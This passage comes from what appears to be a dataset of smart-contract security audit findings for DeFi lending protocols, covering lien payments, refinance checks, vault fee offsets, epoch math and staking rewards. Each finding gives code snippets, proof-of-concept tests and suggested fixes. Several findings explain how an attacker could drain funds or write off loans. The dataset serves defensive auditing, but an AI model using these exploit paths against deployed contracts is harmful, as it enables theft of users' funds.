Therefore, rather than the full existing formula, we can simply call:\\n```\\nPublicVault(VAULT()).decreaseYIntercept(expected - balance)\\n```\\n\\nAlternatively, we can move the current code above the block of code that transfers funds out (L73).","Every time the liquidation accountant is used, the vault's math will be thrown off and user shares will be falsely diluted.","```\\nPublicVault(VAULT()).decreaseYIntercept(\\n (expected - ERC20(underlying()).balanceOf(address(this))).mulDivDown(\\n 1e18 - withdrawRatio,\\n 1e18\\n )\\n);\\n```\\n" +liquidationAccountant can be claimed at any time,high,"New liquidations are sent to the `liquidationAccountant` with a `finalAuctionTimestamp` value, but the actual value that is passed in is simply the duration of an auction. The `claim()` function uses this value in a require check, so this error will allow it to be called before the auction is complete.\\nWhen a lien is liquidated, `AstariaRouter.sol:liquidate()` is called. If the lien is set to end in a future epoch, we call `handleNewLiquidation()` on the `liquidationAccountant`.\\nOne of the values passed in this call is the `finalAuctionTimestamp`, which updates the `finalAuctionEnd` variable in the `liquidationAccountant`. 
This value is then used to protect the `claim()` function from being called too early.\\nHowever, when the router calls `handleLiquidationAccountant()`, it passes the duration of an auction rather than the final timestamp:\\n```\\nLiquidationAccountant(accountant).handleNewLiquidation(\\n lien.amount,\\n COLLATERAL_TOKEN.auctionWindow() + 1 days\\n);\\n```\\n\\nAs a result, `finalAuctionEnd` will be set to 259200 (3 days).\\nWhen `claim()` is called, it requires the final auction to have ended for the function to be called:\\n```\\nrequire(\\n block.timestamp > finalAuctionEnd || finalAuctionEnd == uint256(0),\\n ""final auction has not ended""\\n);\\n```\\n\\nBecause of the error above, `block.timestamp` will always be greater than `finalAuctionEnd`, so this will always be permitted.","Adjust the call from the router to use the ending timestamp as the argument, rather than the duration:\\n```\\nLiquidationAccountant(accountant).handleNewLiquidation(\\n lien.amount,\\n block.timestamp + COLLATERAL_TOKEN.auctionWindow() + 1 days\\n);\\n```\\n","Anyone can call `claim()` before an auction has ended. 
This can cause many problems, but the clearest is that it can ruin the protocol's accounting by decreasing the Y intercept of the vault.\\nFor example, if `claim()` is called before the auction, the returned value will be 0, so the Y intercept will be decreased as if there was an auction that returned no funds.","```\\nLiquidationAccountant(accountant).handleNewLiquidation(\\n lien.amount,\\n COLLATERAL_TOKEN.auctionWindow() + 1 days\\n);\\n```\\n" +Incorrect fees will be charged,high,"If user has provided transferAmount which is greater than all lien.amount combined then initiatorPayment will be incorrect since it is charged on full amount when only partial was used as shown in poc\\nObserve the _handleIncomingPayment function\\nLets say transferAmount was 1000\\ninitiatorPayment is calculated on this full transferAmount\\n```\\nuint256 initiatorPayment = transferAmount.mulDivDown(\\n auction.initiatorFee,\\n 100\\n ); \\n```\\n\\nNow all lien are iterated and lien.amount is kept on deducting from transferAmount until all lien are navigated\\n```\\nif (transferAmount >= lien.amount) {\\n payment = lien.amount;\\n transferAmount -= payment;\\n } else {\\n payment = transferAmount;\\n transferAmount = 0;\\n }\\n\\n if (payment > 0) {\\n LIEN_TOKEN.makePayment(tokenId, payment, lien.position, payer);\\n }\\n }\\n```\\n\\nLets say after loop completes the transferAmount is still left as 100\\nThis means only 400 transferAmount was used but fees was deducted on full amount 500",Calculate the exact amount of transfer amount required for the transaction and calculate the initiator fee based on this amount,Excess initiator fees will be deducted which was not required,"```\\nuint256 initiatorPayment = transferAmount.mulDivDown(\\n auction.initiatorFee,\\n 100\\n ); \\n```\\n" +"isValidRefinance checks both conditions instead of one, leading to rejection of valid refinances",high,"`isValidRefinance()` is intended to check whether either (a) the loan interest rate decreased 
sufficiently or (b) the loan duration increased sufficiently. Instead, it requires both of these to be true, leading to the rejection of valid refinances.\\nWhen trying to buy out a lien from `LienToken.sol:buyoutLien()`, the function calls `AstariaRouter.sol:isValidRefinance()` to check whether the refi terms are valid.\\n```\\nif (!ASTARIA_ROUTER.isValidRefinance(lienData[lienId], ld)) {\\n revert InvalidRefinance();\\n}\\n```\\n\\nOne of the roles of this function is to check whether the rate decreased by more than 0.5%. From the docs:\\nAn improvement in terms is considered if either of these conditions is met:\\nThe loan interest rate decrease by more than 0.5%.\\nThe loan duration increases by more than 14 days.\\nThe currently implementation of the code requires both of these conditions to be met:\\n```\\nreturn (\\n newLien.rate >= minNewRate &&\\n ((block.timestamp + newLien.duration - lien.start - lien.duration) >= minDurationIncrease)\\n);\\n```\\n",Change the AND in the return statement to an OR:\\n```\\nreturn (\\n newLien.rate >= minNewRate ||\\n ((block.timestamp + newLien.duration - lien.start - lien.duration) >= minDurationIncrease)\\n);\\n```\\n,Valid refinances that meet one of the two criteria will be rejected.,"```\\nif (!ASTARIA_ROUTER.isValidRefinance(lienData[lienId], ld)) {\\n revert InvalidRefinance();\\n}\\n```\\n" +isValidRefinance will approve invalid refinances and reject valid refinances due to buggy math,high,"The math in `isValidRefinance()` checks whether the rate increased rather than decreased, resulting in invalid refinances being approved and valid refinances being rejected.\\nWhen trying to buy out a lien from `LienToken.sol:buyoutLien()`, the function calls `AstariaRouter.sol:isValidRefinance()` to check whether the refi terms are valid.\\n```\\nif (!ASTARIA_ROUTER.isValidRefinance(lienData[lienId], ld)) {\\n revert InvalidRefinance();\\n}\\n```\\n\\nOne of the roles of this function is to check whether the rate decreased by 
more than 0.5%. From the docs:\\nAn improvement in terms is considered if either of these conditions is met:\\nThe loan interest rate decrease by more than 0.5%.\\nThe loan duration increases by more than 14 days.\\nThe current implementation of the function does the opposite. It calculates a `minNewRate` (which should be maxNewRate) and then checks whether the new rate is greater than that value.\\n```\\nuint256 minNewRate = uint256(lien.rate) - minInterestBPS;\\nreturn (newLien.rate >= minNewRate // rest of code\\n```\\n\\nThe result is that if the new rate has increased (or decreased by less than 0.5%), it will be considered valid, but if it has decreased by more than 0.5% (the ideal behavior) it will be rejected as invalid.",Flip the logic used to check the rate to the following:\\n```\\nuint256 maxNewRate = uint256(lien.rate) - minInterestBPS;\\nreturn (newLien.rate <= maxNewRate// rest of code\\n```\\n,Users can perform invalid refinances with the wrong parameters.\\nUsers who should be able to perform refinances at better rates will not be able to.,"```\\nif (!ASTARIA_ROUTER.isValidRefinance(lienData[lienId], ld)) {\\n revert InvalidRefinance();\\n}\\n```\\n" +"new loans ""max duration"" is not restricted",medium,"document : "" Epochs PublicVaults operate around a time-based epoch system. An epoch length is defined by the strategist that deploys the PublicVault. The duration of new loans is restricted to not exceed the end of the next epoch. For example, if a PublicVault is 15 days into a 30-day epoch, new loans must not be longer than 45 days. "" but more than 2 epoch's duration can be added\\nthe max duration is not detected. 
add success when > next epoch\\n#AstariaTest#testBasicPublicVaultLoan\\n```\\n function testBasicPublicVaultLoan() public {\\n\\n IAstariaRouter.LienDetails memory standardLien2 =\\n IAstariaRouter.LienDetails({\\n maxAmount: 50 ether,\\n rate: (uint256(1e16) * 150) / (365 days),\\n duration: 50 days, /****** more then 14 * 2 *******/\\n maxPotentialDebt: 50 ether\\n }); \\n\\n _commitToLien({\\n vault: publicVault,\\n strategist: strategistOne,\\n strategistPK: strategistOnePK,\\n tokenContract: tokenContract,\\n tokenId: tokenId,\\n lienDetails: standardLien2, /**** use standardLien2 ****/\\n amount: 10 ether,\\n isFirstLien: true\\n });\\n }\\n```\\n","PublicVault#_afterCommitToLien\\n```\\n function _afterCommitToLien(uint256 lienId, uint256 amount)\\n internal\\n virtual\\n override\\n {\\n // increment slope for the new lien\\n unchecked {\\n slope += LIEN_TOKEN().calculateSlope(lienId);\\n }\\n\\n ILienToken.Lien memory lien = LIEN_TOKEN().getLien(lienId);\\n\\n uint256 epoch = Math.ceilDiv(\\n lien.start + lien.duration - START(),\\n EPOCH_LENGTH()\\n ) - 1;\\n\\n+ require(epoch <= currentEpoch + 1,""epoch max <= currentEpoch + 1"");\\n\\n liensOpenForEpoch[epoch]++;\\n emit LienOpen(lienId, epoch);\\n }\\n```\\n",Too long duration,"```\\n function testBasicPublicVaultLoan() public {\\n\\n IAstariaRouter.LienDetails memory standardLien2 =\\n IAstariaRouter.LienDetails({\\n maxAmount: 50 ether,\\n rate: (uint256(1e16) * 150) / (365 days),\\n duration: 50 days, /****** more then 14 * 2 *******/\\n maxPotentialDebt: 50 ether\\n }); \\n\\n _commitToLien({\\n vault: publicVault,\\n strategist: strategistOne,\\n strategistPK: strategistOnePK,\\n tokenContract: tokenContract,\\n tokenId: tokenId,\\n lienDetails: standardLien2, /**** use standardLien2 ****/\\n amount: 10 ether,\\n isFirstLien: true\\n });\\n }\\n```\\n" +_makePayment is logically inconsistent with how lien stack is managed causing payments to multiple liens to fail,medium,"`_makePayment(uint256, 
uint256)` looping logic is inconsistent with how `_deleteLienPosition` manages the lien stack. `_makePayment` loops from 0 to `openLiens.length` but `_deleteLienPosition` (called when a lien is fully paid off) actively compresses the lien stack. When a payment pays off multiple liens the compressing effect causes an array OOB error towards the end of the loop.\\n```\\nfunction _makePayment(uint256 collateralId, uint256 totalCapitalAvailable)\\n internal\\n{\\n uint256[] memory openLiens = liens[collateralId];\\n uint256 paymentAmount = totalCapitalAvailable;\\n for (uint256 i = 0; i < openLiens.length; ++i) {\\n uint256 capitalSpent = _payment(\\n collateralId,\\n uint8(i),\\n paymentAmount,\\n address(msg.sender)\\n );\\n paymentAmount -= capitalSpent;\\n }\\n}\\n```\\n\\n`LienToken.sol#_makePayment(uint256, uint256)` loops from 0 to `openLiens.Length`. This loop attempts to make a payment to each lien calling `_payment` with the current index of the loop.\\n```\\nfunction _deleteLienPosition(uint256 collateralId, uint256 position) public {\\n uint256[] storage stack = liens[collateralId];\\n require(position < stack.length, ""index out of bounds"");\\n\\n emit RemoveLien(\\n stack[position],\\n lienData[stack[position]].collateralId,\\n lienData[stack[position]].position\\n );\\n for (uint256 i = position; i < stack.length - 1; i++) {\\n stack[i] = stack[i + 1];\\n }\\n stack.pop();\\n}\\n```\\n\\n`LienToken.sol#_deleteLienPosition` is called on liens when they are fully paid off. The most interesting portion of the function is how the lien is removed from the stack. We can see that all liens above the lien in question are slid down the stack and the top is popped. This has the effect of reducing the total length of the array. This is where the logical inconsistency is. If the first lien is paid off, it will be removed and the formerly second lien will now occupy it's index. 
So then when `_payment` is called in the next loop with the next index it won't reference the second lien since the second lien is now in the first lien index.\\nAssuming there are 2 liens on some collateral. `liens[0].amount = 100` and `liens[1].amount = 50`. A user wants to pay off their entire lien balance so they call `_makePayment(uint256, uint256)` with an amount of 150. On the first loop it calls `_payment` with an index of 0. This pays off `liens[0]`. `_deleteLienPosition` is called with index of 0 removing `liens[0]`. Because of the sliding logic in `_deleteLienPosition` `lien[1]` has now slid into the `lien[0]` position. On the second loop it calls `_payment` with an index of 1. When it tries to grab the data for the lien at that index it will revert due to OOB error because the array no longer contains an index of 1.",Payment logic inside of `AuctionHouse.sol` works. `_makePayment` should be changed to mimic that logic.,Large payments are impossible and users must manually pay off each lien separately,"```\\nfunction _makePayment(uint256 collateralId, uint256 totalCapitalAvailable)\\n internal\\n{\\n uint256[] memory openLiens = liens[collateralId];\\n uint256 paymentAmount = totalCapitalAvailable;\\n for (uint256 i = 0; i < openLiens.length; ++i) {\\n uint256 capitalSpent = _payment(\\n collateralId,\\n uint8(i),\\n paymentAmount,\\n address(msg.sender)\\n );\\n paymentAmount -= capitalSpent;\\n }\\n}\\n```\\n" +LienToken._payment function increases users debt,medium,"LienToken._payment function increases users debt by setting `lien.amount = _getOwed(lien)`\\n`LienToken._payment` is used by `LienToken.makePayment` function that allows borrower to repay part or all his debt.\\nAlso this function can be called by `AuctionHouse` when the lien is liquidated.\\n```\\n function _payment(\\n uint256 collateralId,\\n uint8 position,\\n uint256 paymentAmount,\\n address payer\\n ) internal returns (uint256) {\\n if (paymentAmount == uint256(0)) {\\n return 
uint256(0);\\n }\\n\\n\\n uint256 lienId = liens[collateralId][position];\\n Lien storage lien = lienData[lienId];\\n uint256 end = (lien.start + lien.duration);\\n require(\\n block.timestamp < end || address(msg.sender) == address(AUCTION_HOUSE),\\n ""cannot pay off an expired lien""\\n );\\n\\n\\n address lienOwner = ownerOf(lienId);\\n bool isPublicVault = IPublicVault(lienOwner).supportsInterface(\\n type(IPublicVault).interfaceId\\n );\\n\\n\\n lien.amount = _getOwed(lien);\\n\\n\\n address payee = getPayee(lienId);\\n if (isPublicVault) {\\n IPublicVault(lienOwner).beforePayment(lienId, paymentAmount);\\n }\\n if (lien.amount > paymentAmount) {\\n lien.amount -= paymentAmount;\\n lien.last = block.timestamp.safeCastTo32();\\n // slope does not need to be updated if paying off the rest, since we neutralize slope in beforePayment()\\n if (isPublicVault) {\\n IPublicVault(lienOwner).afterPayment(lienId);\\n }\\n } else {\\n if (isPublicVault && !AUCTION_HOUSE.auctionExists(collateralId)) {\\n // since the openLiens count is only positive when there are liens that haven't been paid off\\n // that should be liquidated, this lien should not be counted anymore\\n IPublicVault(lienOwner).decreaseEpochLienCount(\\n IPublicVault(lienOwner).getLienEpoch(end)\\n );\\n }\\n //delete liens\\n _deleteLienPosition(collateralId, position);\\n delete lienData[lienId]; //full delete\\n\\n\\n _burn(lienId);\\n }\\n\\n\\n TRANSFER_PROXY.tokenTransferFrom(WETH, payer, payee, paymentAmount);\\n\\n\\n emit Payment(lienId, paymentAmount);\\n return paymentAmount;\\n }\\n```\\n\\nHere lien.amount becomes lien.amount + accrued interests, because `_getOwed` do that calculation.\\n`lien.amount` is the amount that user borrowed. So actually that line has just increased user's debt. And in case if he didn't pay all amount of lien, then next time he will pay more interests.\\nExample. User borrows 1 eth. His `lien.amount` is 1eth. Then he wants to repay some part(let's say 0.5 eth). 
Now his `lien.amount` becomes `lien.amount + interests`. When he pays next time, he pays `(lien.amount + interests) + new interests`. So interests are acummulated on previous interests.",Issue LienToken._payment function increases users debt\\nDo not update lien.amount to _getOwed(lien).,User borrowed amount increases and leads to lose of funds.,"```\\n function _payment(\\n uint256 collateralId,\\n uint8 position,\\n uint256 paymentAmount,\\n address payer\\n ) internal returns (uint256) {\\n if (paymentAmount == uint256(0)) {\\n return uint256(0);\\n }\\n\\n\\n uint256 lienId = liens[collateralId][position];\\n Lien storage lien = lienData[lienId];\\n uint256 end = (lien.start + lien.duration);\\n require(\\n block.timestamp < end || address(msg.sender) == address(AUCTION_HOUSE),\\n ""cannot pay off an expired lien""\\n );\\n\\n\\n address lienOwner = ownerOf(lienId);\\n bool isPublicVault = IPublicVault(lienOwner).supportsInterface(\\n type(IPublicVault).interfaceId\\n );\\n\\n\\n lien.amount = _getOwed(lien);\\n\\n\\n address payee = getPayee(lienId);\\n if (isPublicVault) {\\n IPublicVault(lienOwner).beforePayment(lienId, paymentAmount);\\n }\\n if (lien.amount > paymentAmount) {\\n lien.amount -= paymentAmount;\\n lien.last = block.timestamp.safeCastTo32();\\n // slope does not need to be updated if paying off the rest, since we neutralize slope in beforePayment()\\n if (isPublicVault) {\\n IPublicVault(lienOwner).afterPayment(lienId);\\n }\\n } else {\\n if (isPublicVault && !AUCTION_HOUSE.auctionExists(collateralId)) {\\n // since the openLiens count is only positive when there are liens that haven't been paid off\\n // that should be liquidated, this lien should not be counted anymore\\n IPublicVault(lienOwner).decreaseEpochLienCount(\\n IPublicVault(lienOwner).getLienEpoch(end)\\n );\\n }\\n //delete liens\\n _deleteLienPosition(collateralId, position);\\n delete lienData[lienId]; //full delete\\n\\n\\n _burn(lienId);\\n }\\n\\n\\n 
TRANSFER_PROXY.tokenTransferFrom(WETH, payer, payee, paymentAmount);\\n\\n\\n emit Payment(lienId, paymentAmount);\\n return paymentAmount;\\n }\\n```\\n" +_validateCommitment fails for approved operators,medium,"If a collateral token owner approves another user as an operator for all their tokens (rather than just for a given token), the validation check in `_validateCommitment()` will fail.\\nThe collateral token is implemented as an ERC721, which has two ways to approve another user:\\nApprove them to take actions with a given token (approve())\\nApprove them as an ""operator"" for all your owned tokens (setApprovalForAll())\\nHowever, when the `_validateCommitment()` function checks that the token is owned or approved by `msg.sender`, it does not accept those who are set as operators.\\n```\\nif (msg.sender != holder) {\\n require(msg.sender == operator, ""invalid request"");\\n}\\n```\\n","Include an additional check to confirm whether the `msg.sender` is approved as an operator on the token:\\n```\\n address holder = ERC721(COLLATERAL_TOKEN()).ownerOf(collateralId);\\n address approved = ERC721(COLLATERAL_TOKEN()).getApproved(collateralId);\\n address operator = ERC721(COLLATERAL_TOKEN()).isApprovedForAll(holder);\\n\\n if (msg.sender != holder) {\\n require(msg.sender == operator || msg.sender == approved, ""invalid request"");\\n }\\n```\\n",Approved operators of collateral tokens will be rejected from taking actions with those tokens.,"```\\nif (msg.sender != holder) {\\n require(msg.sender == operator, ""invalid request"");\\n}\\n```\\n" +"timeToEpochEnd calculates backwards, breaking protocol math",medium,"When a lien is liquidated, it calls `timeToEpochEnd()` to determine if a liquidation accountant should be deployed and we should adjust the protocol math to expect payment in a future epoch. 
Because of an error in the implementation, all liquidations that will pay out in the current epoch are set up as future epoch liquidations.\\nThe `liquidate()` function performs the following check to determine if it should set up the liquidation to be paid out in a future epoch:\\n```\\nif (PublicVault(owner).timeToEpochEnd() <= COLLATERAL_TOKEN.auctionWindow())\\n```\\n\\nThis check expects that `timeToEpochEnd()` will return the time until the epoch is over. However, the implementation gets this backwards:\\n```\\nfunction timeToEpochEnd() public view returns (uint256) {\\n uint256 epochEnd = START() + ((currentEpoch + 1) * EPOCH_LENGTH());\\n\\n if (epochEnd >= block.timestamp) {\\n return uint256(0);\\n }\\n\\n return block.timestamp - epochEnd;\\n}\\n```\\n\\nIf `epochEnd >= block.timestamp`, that means that there IS remaining time in the epoch, and it should perform the calculation to return `epochEnd - block.timestamp`. In the opposite case, where `epochEnd <= block.timestamp`, it should return zero.\\nThe result is that the function returns 0 for any epoch that isn't over. Since `0 < COLLATERAL_TOKEN.auctionWindow())`, all liquidated liens will trigger a liquidation accountant and the rest of the accounting for future epoch withdrawals.",Fix the `timeToEpochEnd()` function so it calculates the remaining time properly:\\n```\\nfunction timeToEpochEnd() public view returns (uint256) {\\n uint256 epochEnd = START() + ((currentEpoch + 1) * EPOCH_LENGTH());\\n\\n if (epochEnd <= block.timestamp) {\\n return uint256(0);\\n }\\n\\n return epochEnd - block.timestamp; //\\n}\\n```\\n,"Accounting for a future epoch withdrawal causes a number of inconsistencies in the protocol's math, the impact of which vary depending on the situation. As a few examples:\\nIt calls `decreaseEpochLienCount()`. 
This has the effect of artificially lowering the number of liens in the epoch, which will cause the final liens paid off in the epoch to revert (and will let us process the epoch earlier than intended).\\nIt sets the payee of the lien to the liquidation accountant, which will pay out according to the withdrawal ratio (whereas all funds should be staying in the vault).\\nIt calls `increaseLiquidationsExpectedAtBoundary()`, which can throw off the math when processing the epoch.",```\\nif (PublicVault(owner).timeToEpochEnd() <= COLLATERAL_TOKEN.auctionWindow())\\n```\\n +"_payment() function transfers full paymentAmount, overpaying first liens",medium,"The `_payment()` function sends the full `paymentAmount` argument to the lien owner, which both (a) overpays lien owners if borrowers accidentally overpay and (b) sends the first lien owner all the funds for the entire loop of a borrower is intending to pay back multiple loans.\\nThere are two `makePayment()` functions in LienToken.sol. One that allows the user to specific a `position` (which specific lien they want to pay back, and another that iterates through their liens, paying each back.\\nIn both cases, the functions call out to `_payment()` with a `paymentAmount`, which is sent (in full) to the lien owner.\\n```\\nTRANSFER_PROXY.tokenTransferFrom(WETH, payer, payee, paymentAmount);\\n```\\n\\nThis behavior can cause problems in both cases.\\nThe first case is less severe: If the user is intending to pay off one lien, and they enter a `paymentAmount` greater than the amount owed, the function will send the full `paymentAmount` to the lien owner, rather than just sending the amount owed.\\nThe second case is much more severe: If the user is intending to pay towards all their loans, the `_makePayment()` function loops through open liens and performs the following:\\n```\\nuint256 paymentAmount = totalCapitalAvailable;\\nfor (uint256 i = 0; i < openLiens.length; ++i) {\\n uint256 capitalSpent = _payment(\\n 
collateralId,\\n uint8(i),\\n paymentAmount,\\n address(msg.sender)\\n );\\n paymentAmount -= capitalSpent;\\n}\\n```\\n\\nThe `_payment()` function is called with the first lien with `paymentAmount` set to the full amount sent to the function. The result is that this full amount is sent to the first lien holder, which could greatly exceed the amount they are owed.","Issue _payment() function transfers full paymentAmount, overpaying first liens\\nIn `_payment()`, if `lien.amount < paymentAmount`, set `paymentAmount = lien.amount`.\\nThe result will be that, in this case, only `lien.amount` is transferred to the lien owner, and this value is also returned from the function to accurately represent the amount that was paid.","A user who is intending to pay off all their loans will end up paying all the funds they offered, but only paying off their first lien, potentially losing a large amount of funds.","```\\nTRANSFER_PROXY.tokenTransferFrom(WETH, payer, payee, paymentAmount);\\n```\\n" +_getInterest() function uses block.timestamp instead of the inputted timestamp,medium,"The `_getInterest()` function takes a timestamp as input. However, in a crucial check in the function, it uses `block.timestamp` instead. The result is that other functions expecting accurate interest amounts will receive incorrect values.\\nThe `_getInterest()` function takes a lien and a timestamp as input. 
The intention is for it to calculate the amount of time that has passed in the lien (delta_t) and multiply this value by the rate and the amount to get the interest generated by this timestamp.\\nHowever, the function uses the following check regarding the timestamp:\\n```\\nif (block.timestamp >= lien.start + lien.duration) {\\n delta_t = uint256(lien.start + lien.duration - lien.last);\\n} \\n```\\n\\nBecause this check uses `block.timestamp` before returning the maximum interest payment, the function will incorrectly determine which path to take, and return an incorrect interest value.",Change `block.timestamp` to `timestamp` so that the if statement checks correctly.,"There are two negative consequences that can come from this miscalculation:\\nif the function is called when the lien is over (block.timestamp >= lien.start + lien.duration) to check an interest amount from a timestamp during the lien, it will incorrectly return the maximum interest value\\nIf the function is called when the lien is active for a timestamp long after the lien is over, it will skip the check to return maximum value and return the value that would have been generated if interest kept accruing indefinitely (using delta_t = uint256(timestamp.safeCastTo32() - lien.last);)\\nThis `_getInterest()` function is used in many crucial protocol functions (_getOwed(), `calculateSlope()`, `changeInSlope()`, getTotalDebtForCollateralToken()), so these incorrect values can have surprising and unexpected negative impacts on the protocol.",```\\nif (block.timestamp >= lien.start + lien.duration) {\\n delta_t = uint256(lien.start + lien.duration - lien.last);\\n} \\n```\\n +"Vault Fee uses incorrect offset leading to wildly incorrect value, allowing strategists to steal all funds",medium,"`VAULT_FEE()` uses an incorrect offset, returning a number ~1e16X greater than intended, providing strategists with unlimited access to drain all vault funds.\\nWhen using ClonesWithImmutableArgs, offset values are 
set so that functions representing variables can retrieve the correct values from storage.\\nIn the ERC4626-Cloned.sol implementation, `VAULT_TYPE()` is given an offset of 172. However, the value before it is a `uint8` at the offset 164. Since a `uint8` takes only 1 byte of space, `VAULT_TYPE()` should have an offset of 165.\\nI put together a POC to grab the value of `VAULT_FEE()` in the test setup:\\n```\\nfunction testVaultFeeIncorrectlySet() public {\\n Dummy721 nft = new Dummy721();\\n address tokenContract = address(nft);\\n uint256 tokenId = uint256(1);\\n address publicVault = _createPublicVault({\\n strategist: strategistOne,\\n delegate: strategistTwo,\\n epochLength: 14 days\\n });\\n uint fee = PublicVault(publicVault).VAULT_FEE();\\n console.log(fee)\\n assert(fee == 5000); // 5000 is the value that was meant to be set\\n}\\n```\\n\\nIn this case, the value returned is > 3e20.",Set the offset for `VAULT_FEE()` to 165. I tested this value in the POC I created and it correctly returned the value of 5000.,"This is a highly critical bug. `VAULT_FEE()` is used in `_handleStrategistInterestReward()` to determine the amount of tokens that should be allocated to `strategistUnclaimedShares`.\\n```\\nif (VAULT_FEE() != uint256(0)) {\\n uint256 interestOwing = LIEN_TOKEN().getInterest(lienId);\\n uint256 x = (amount > interestOwing) ? 
interestOwing : amount;\\n uint256 fee = x.mulDivDown(VAULT_FEE(), 1000); //VAULT_FEE is a basis point\\n strategistUnclaimedShares += convertToShares(fee);\\n }\\n```\\n\\nThe result is that strategistUnclaimedShares will be billions of times higher than the total interest generated, essentially giving strategist access to withdraw all funds from their vaults at any time.","```\\nfunction testVaultFeeIncorrectlySet() public {\\n Dummy721 nft = new Dummy721();\\n address tokenContract = address(nft);\\n uint256 tokenId = uint256(1);\\n address publicVault = _createPublicVault({\\n strategist: strategistOne,\\n delegate: strategistTwo,\\n epochLength: 14 days\\n });\\n uint fee = PublicVault(publicVault).VAULT_FEE();\\n console.log(fee)\\n assert(fee == 5000); // 5000 is the value that was meant to be set\\n}\\n```\\n" +Bids cannot be created within timeBuffer of completion of a max duration auction,medium,"The auction mechanism is intended to watch for bids within `timeBuffer` of the end of the auction, and automatically increase the remaining duration to `timeBuffer` if such a bid comes in.\\nThere is an error in the implementation that causes all bids within `timeBuffer` of the end of a max duration auction to revert, effectively ending the auction early and cutting off bidders who intended to wait until the end.\\nIn the `createBid()` function in AuctionHouse.sol, the function checks if a bid is within the final `timeBuffer` of the auction:\\n```\\nif (firstBidTime + duration - block.timestamp < timeBuffer)\\n```\\n\\nIf so, it sets `newDuration` to equal the amount that will extend the auction to `timeBuffer` from now:\\n```\\nuint64 newDuration = uint256( duration + (block.timestamp + timeBuffer - firstBidTime) ).safeCastTo64();\\n```\\n\\nIf this `newDuration` doesn't extend beyond the `maxDuration`, this works great. 
However, if it does extend beyond `maxDuration`, the following code is used to update duration:\\n```\\nauctions[tokenId].duration = auctions[tokenId].maxDuration - firstBidTime;\\n```\\n\\nThis code is incorrect. `maxDuration` will be a duration for the contest (currently set to 3 days), whereas `firstTimeBid` is a timestamp for the start of the auction (current timestamps are > 1 billion).\\nSubtracting `firstTimeBid` from `maxDuration` will underflow, which will revert the function.","Change this assignment to simply assign `duration` to `maxDuration`, as follows:\\n```\\nauctions[tokenId].duration = auctions[tokenId].maxDuration\\n```\\n","Bidders who expected to wait until the end of the auction to vote will be cut off from voting, as the auction will revert their bids.\\nVaults whose collateral is up for auction will earn less than they otherwise would have.",```\\nif (firstBidTime + duration - block.timestamp < timeBuffer)\\n```\\n +Loan can be written off by anybody before overdue delay expires,high,"When a borrower takes a second loan after a loan that has been written off, this second loan can be written off instantly by any other member due to missing update of last repay block, leaving the staker at a loss.\\nA staker stakes and vouches a borrower\\nthe borrower borrows calling UToken:borrow: `accountBorrows[borrower].lastRepay` is updated with the current block number\\nthe staker writes off the entire debt of the borrower calling `UserManager:debtWriteOff`. In the internal call to `UToken:debtWriteOff` the principal is set to zero but `accountBorrows[borrower].lastRepay` is not updated\\n90 days pass and a staker vouches for the same borrower\\nthe borrower borrows calling UToken:borrow: `accountBorrows[borrower].lastRepay` is not set to the current block since non zero and stays to the previous value.\\n`accountBorrows[borrower].lastRepay` is now old enough to allow the check in `UserManager:debtWriteOff` at line 738 to pass. 
The debt is written off by any other member immediately after the loan is given. The staker loses the staked amount immediately.\\n```\\n if (block.number <= lastRepay + overdueBlocks + maxOverdueBlocks) {\\n if (staker != msg.sender) revert AuthFailed();\\n }\\n```\\n\\nThe last repay block is still stale and a new loan can be taken and written off immediately many times as long as stakers are trusting the borrower\\nNote that this can be exploited maliciously by the borrower, who can continuously ask for loans and then write them off immediately.","Issue Loan can be written off by anybody before overdue delay expires\\nReset `lastRepay` for the borrower to 0 when the debt is written off completely\\n```\\n function debtWriteOff(address borrower, uint256 amount) external override whenNotPaused onlyUserManager {\\n uint256 oldPrincipal = getBorrowed(borrower);\\n uint256 repayAmount = amount > oldPrincipal ? oldPrincipal : amount;\\n\\n// Add the line below\\n if (oldPrincipal == repayAmount) accountBorrows[borrower].lastRepay = 0;\\n accountBorrows[borrower].principal = oldPrincipal - repayAmount;\\n totalBorrows -= repayAmount;\\n }\\n```\\n",The staker of the loan loses the staked amount well before the overdue delay has expired,```\\n if (block.number <= lastRepay + overdueBlocks + maxOverdueBlocks) {\\n if (staker != msg.sender) revert AuthFailed();\\n }\\n```\\n +A stake that has just been locked gets full reward multiplier,medium,"A staker gets rewarded with full multiplier even if its stake has just been locked. 
Multiplier calculation should take into account the duration of the lock.\\nA staker stakes an amount of tokens.\\nThe staker waits for some time\\nThe staker has control of another member (bribe, ...)\\nThe staker vouches this other member\\nThe member borrows\\nThe staker calls `Comptroller:withdrawRewards` and gets an amount of rewards with a multiplier corresponding to a locked stake\\nThe member repays the loan\\nNote that steps 4 to 7 can be made in one tx, so no interest is paid at step 7.\\nThe result is that the staker can always get the full multiplier for rewards, without ever putting any funds at risk, nor any interest being paid. This is done at the expense of other honest stakers, who get proprotionally less of the rewards dripped into the comptroller.\\nFor a coded PoC replace the test `""staker with locked balance gets more rewards""` in `staking.ts` with the following\\n```\\n it(""PoC: staker with locked balance gets more rewards even when just locked"", async () => {\\n const trustAmount = parseUnits(""2000"");\\n const borrowAmount = parseUnits(""1800"");\\n const [account, staker, borrower] = members;\\n\\n const [accountStaked, borrowerStaked, stakerStaked] = await helpers.getStakedAmounts(\\n account,\\n staker,\\n borrower\\n );\\n\\n expect(accountStaked).eq(borrowerStaked);\\n expect(borrowerStaked).eq(stakerStaked);\\n\\n await helpers.updateTrust(staker, borrower, trustAmount);\\n \\n await roll(10);\\n await helpers.borrow(borrower, borrowAmount); // borrows just after withdrawing\\n \\n const [accountMultiplier, stakerMultiplier] = await helpers.getRewardsMultipliers(account, staker);\\n console.log(""accountMultiplier: "", accountMultiplier);\\n console.log(""StakerMultiplier: "", stakerMultiplier);\\n expect(accountMultiplier).lt(stakerMultiplier); // the multiplier is larger even if just locked\\n });\\n```\\n","Issue A stake that has just been locked gets full reward multiplier\\nShould introduce the accounting of the duration of a 
